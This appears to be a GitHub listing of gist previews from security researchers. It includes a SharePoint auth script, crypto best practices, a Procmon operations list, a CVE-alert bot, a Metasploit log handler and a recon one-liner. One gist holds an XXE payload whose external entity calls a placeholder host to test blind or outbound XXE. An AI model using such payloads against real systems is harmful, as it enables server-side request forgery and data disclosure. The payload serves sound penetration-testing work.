Michael Skelton codingo
@juntalis
juntalis / spauth.py
Created April 1, 2012 07:46
Claims-based Authentication Example for interacting with Sharepoint Online
import os, requests, re
from htmlentitydefs import name2codepoint
from simplejson import loads, dumps
spauth = None
def unescape(s):
    name2codepoint['#39'] = 39
    return re.sub('&(%s);' % '|'.join(name2codepoint),
                  lambda m: unichr(name2codepoint[m.group(1)]), s)
@staaldraad
staaldraad / XXE_payloads
Last active July 31, 2025 23:05
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@atoponce
atoponce / gist:07d8d4c833873be2f68c34f9afc5a78a
Last active August 11, 2025 13:19 — forked from tqbf/gist:be58d2d39690c3b366ad
Cryptographic Best Practices

Cryptographic Best Practices

Putting cryptographic primitives together is a lot like putting a jigsaw puzzle together, where all the pieces are cut exactly the same way, but there is only one correct solution. Thankfully, there are some projects out there that are working hard to make sure developers are getting it right.

The following advice comes from years of research from leading security researchers, developers, and cryptographers. This Gist was [forked from Thomas Ptacek's Gist][1] to be more readable. Additions have been added from

@mgeeky
mgeeky / Procmon_operationst.txt
Last active July 22, 2025 00:11
PROCMON Operations list
CloseFile
CreateFile
CreateFileMapping
DeviceIoControl
FileSystemControl
FlushBuffersFile
Load Image
LockFile
NotifyChangeDirectory
Process Create
@nerandell
nerandell / code-review-checklist.md
Last active August 19, 2025 14:27
PHP Code Review Guidelines

Make sure these boxes are checked before submitting/approving the PR

General

  • The code works
  • The code is easy to understand
  • Follows coding conventions
  • Names are simple and if possible short
  • Names are spelt correctly
  • Names contain units where applicable
  • There are no usages of magic numbers
@stefan2904
stefan2904 / index.php
Created October 2, 2016 17:49
TUM CTF: free_as_in_bavarian_beer (writeup on https://hack.more.systems )
<?php
/*
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
@PaulSec
PaulSec / monitor_cve.py
Created February 26, 2018 09:50
Monitors @cvenew and sends me a message on Telegram if a keyword triggers
from tweepy import StreamListener
from tweepy import Stream
import tweepy
import json
import telebot
import requests
CONSUMER_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX'
@zeroSteiner
zeroSteiner / log_handler.py
Last active April 6, 2022 19:14
Python logging.Handler for use in external Metasploit modules.
import logging
import metasploit.module as module
class MetasploitLogHandler(logging.Handler):
    def emit(self, record):
        log_entry = self.format(record)
        level = 'debug'
        if record.levelno >= logging.ERROR:
            level = 'error'
        elif record.levelno >= logging.WARNING:
@Rhynorater
Rhynorater / bookmarklet.js
Created March 27, 2018 01:19
OSCP Video Playback Speed Increase
javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load();
curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt